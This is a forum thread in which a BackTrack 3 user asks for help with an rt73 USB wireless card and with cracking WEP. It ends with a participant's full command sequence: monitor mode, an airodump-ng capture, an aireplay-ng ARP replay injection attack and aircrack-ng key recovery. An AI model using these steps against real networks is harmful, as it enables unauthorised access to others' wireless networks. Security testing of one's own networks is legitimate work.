backtrack, Wireless ?

Backtrack3, wireless ? regarding WEP / WAP / Airmon, airodump / aireplay, cracking. and etc. i need detail help.

I have searched all sorts of web pages, and have the info on useing airmon, airodump, aireplay... but i'm haveing problems, and speratic issues with useing my wireless card.

PC specs:

AMD 2.4ghz
Ram: 2gigs
HD: 250gig
Vid: nvidia-6200

OS: backtrack 3, on USB Stick.
Wireless: EDIMAX EW-7318USG b/g USB 64/128/256-bit WEP Encryption, WPA ( TKIP, IEEE 802.1x) and AES

Now, i'm trying to use Iwconfig,ifconfig,iwlist,dhclient, & using Other cracking software. to try to get my wireless card to work... in two different ways, using the Command prompt, (Console)

The Wireless device shows up as: RAUSB0 & RT73.

This is what i have done once, and i got connected to my NON-Secured device. and last night, it did not work. nothing has changed... maybe i got lucky that one time:

1.)I ran KWLAN icon. configured my wireless device with an ssid of: MAX.
2.) typed in iwconfig, to make sure it was set up.
3.) if it did not work, i would type in "iwconfig rausb0 essid max"
4.) then: ifconfig rausb0 up, (then it worked, and connected to google, via Firefox.)

last night, and the night before, it word not work.

so, i'm wondering what commands are used, and what order, to get wireless card working, and connected to the net. (i would like most of it to be command based...) unless there is too much typeing and configureing...)


---------

Next section, i tryed cracking my network, with a simple PW. and such.

these are the commands i have tryed...

airmon-ng stop rausb0
ifconfig rausb0 down
macchanger --mac 00:11:22 etc...
airmon-ng start rausb0

airodump-ng rausb0

and its unable to find my wireless device...

I need help understanding, what is happing, and if i'm missing a step, or maybe its my drivers...

i have lots of other documentation, and web links, telling me all kinds of stuff... but i need help, in what order i need to do this stuff in...


I hope, i'm not to comfuseing... i'v been playing with linux for a 1year now... i'm starting to prefer linux over MS os's, because its so much better for everything.... it rocks.

PS... i'm useing the same EDIMAx in XP, and have no problems... So the card is not bad, i just got it a few days ago, from newegg.

Some wireless devices have horrible Linux and other OS support ( even windows drivers have problems ).

Try a Linux compatible PCI device or NDISwrapper.

Good luck

uh,

ok BACKTRACK will only work with certain wireless cards, that is because allot of features backtrack needs to exploit networks are only availabe on certain brands/models/types of wireless adapter, i only know of one off the top of my head and it was made by netgear, look here for a list http://backtrack.offensive-securit [...] ear_WG311T

if yours is not listed chances are that its not compatible.

i have used backtrack before to write a report on how secure networks are so i can understand the legal reason for this software, but if i was to discuss it on these forums however im pretty sure i would be breaking the terms and conditions of this forum and therefore i will not go into detail to explain the commands on how to use backtrack there are literally hundreds of guides on how to hack wireless systems using backtrack and i suggest you search for them using google.

K, thanks "flakes"

this is what i found on there site.

Edimax EW-7318USG

* Driver : rt73
* Chipset : Ralink
* Notice : Follow instructions for using driver with aircrack-ng: http://www.aircrack-ng.org/doku.php?id=rt73


it was a few lines from the bottom, i'll check that out, it looks like it supports it...

i guess, if people cant tell me what order of commands, or even, just to get the dang internet connected, "not cracking" i dont see why the basic commands is agenst the law... but ok...

thanks for your help, with the link. thanks again...

"Hay jeffinmatrix"

no i have not found anything, that is set in stone... still trying to figure it out... but here is a few things... and please let me know, if you come up with anything that might get me closer to the answer... too, thaks man... (also i have lots of other txt files with all sorts of info about how to do this, but have not found step by step, exact info, to make it work perfectly... ) if you need the info, let me know, and we sould come up with something... and we will perfect this... thanks man...



1. Enable the rausb0 interface.
ifconfig rausb0 up

2. Enable prism headers (to show power levels in airodump-ng); allow transmission in monitor mode (enables aireplay-ng attacks)
iwpriv rausb0 forceprism 1
iwprif rausb0 rfmontx 1

3. Put the card into monitor mode
iwconfig rausb0 mode monitor
airmon-ng start rausb0

4. Run airodump-ng to capture packets from your access point to dumpfile*.cap. You should always specify a channel with airodump, because otherwise it will try to scan through all channels, and that will break your injection attack.
airodump-ng --channel <Access Point channel> --bssid <Access Point bssid> -w dumpfile rausb0

4a. After a few seconds in airodump-ng, you should notice that there are clients connected to the access point. Connected clients will be listed under "STATION" at the lower half of the screen. Take note of the MAC address of one of the clients - you will use it in the next step.

5. Open another terminal window to run an ARP replay attack. After some time, an ARP packet will come through and the #/s figure in the airodump-ng window will increase. If the RXQ (receive quality %) column is >90 then you should be getting #/s of 200 or higher, but more importantly, it should be much higher than what it was before.
aireplay-ng --arpreplay -b <Access Point bssid> -h <client MAC addr. from step 4a> rausb0

6. Wait a few minutes until the #Data reaches 100 000 (if you updated in step 0), or 1 000 000 (if you did not update in step 0). This should be more than enough, but we leave the attack running just in case.

7. Open another terminal window and run aircrack-ng.

* If you did not update aircrack-ng in step 0, you will need 1 000 000 IVs, and will have to run aircrack-ng without -z:
aircrack-ng -b <Access Point bssid> dumpfile*.cap
* If you did update in step 0, you can use the PTW attack (-z option). Aircrack should say that it is processing approx. 100 000 IVs. If this number is low (less than 1000), there is some problem with your injection attack. Aircrack will then display "Key Found". You should know what to do after that.
aircrack-ng -z -b <Access Point bssid> dumpfile*.cap

You should now have the key.

(Jeff)

thanks man, ill give it a shot...

later man.